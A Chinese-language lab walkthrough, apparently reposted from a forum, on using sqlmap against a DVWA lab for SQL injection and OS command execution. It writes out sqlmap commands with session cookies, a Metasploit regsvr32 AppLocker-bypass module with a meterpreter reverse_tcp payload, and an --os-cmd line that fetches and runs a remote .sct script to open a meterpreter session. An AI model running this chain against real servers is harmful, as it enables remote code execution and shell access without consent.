在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘

在本文中,我们将了解如何使用sqlmap执行命令注入,并尝试通过sqlmap执行任何cmd命令(如果Web服务器具有sql漏洞)。


需求

Xampp / Wamp服务器                                                                                                          
DVWA实验室
Kali Linux:Burp套件,sqlmap工具            
首先,您需要在XAMPP或WAMP服务器中安装DVWA实验室,请阅读此处的完整文章
现在打开电脑中的DVWA并使用以下凭据登录:
用户名  - admin
密码  - 密码
单击  DVWA Security  并将网站安全级别设置为  
从漏洞列表中选择SQL Injection进行攻击。 在文本框中键入  用户ID:1。不设置浏览器代理,请不要单击提交按钮。设置浏览器代理以使burp套件正常工作。  
在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
打开burp套件点击菜单栏中的代理 ,  然后  按下按钮。回来并点击   dvwa中的提交按钮。Burp诉讼将在获取的数据下提供“cookie”和“referrer”,稍后将在sqlmap命令中使用。
在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
让我们使用sqlmap命令下的“refrere and cookies”枚举所有数据库名称。

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" --dbs

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
请注意,下面给出的图像已经转储了数据库的所有名称。现在我们将选择dvwa进行命令注入攻击。
在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
现在为metasploit框架和类型msfconsole打开另一个终端。
此模块简化了Regsvr32.exe应用程序白名单绕过技术。该模块创建一个托管.sct文件的Web服务器。当用户在系统上键入提供的regsvr32命令时,regsvr32将请求.sct文件,然后执行包含的PowerShell命令。然后,此命令下载并执行指定的有效负载(类似于带有PSH的web_delivery模块)。
两个Web请求(即.sct文件和PowerShell下载和执行)都可以在同一端口上发生。
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit
以上模块将生成恶意代码作为dll文件。复制所选部分的dll文件,然后使用sqlmap命令运行此恶意代码
在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
现在我们将使用sqlmap通过CMD命令执行dll文件,因此在sqlmap命令中粘贴恶意代码,如下图所示。
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" -cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2″ -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"

在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
然后输入4( type 4作为php有效负载,输入1作为公共位置(common location,将有效负载上传为受害PC中的后门。
在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
一旦命令执行回到metasploit框架,你就会打开meterpreter session 1。
输入会话-i 1
meterpreter>sysinfo
在DVWA(OS-cmd)中通过Sqlmap进行命令注入漏洞挖掘
转载请注明本文链接: http://www.mayidui.net/t2334.html
游客
登录后才可以回帖,登录 或者 注册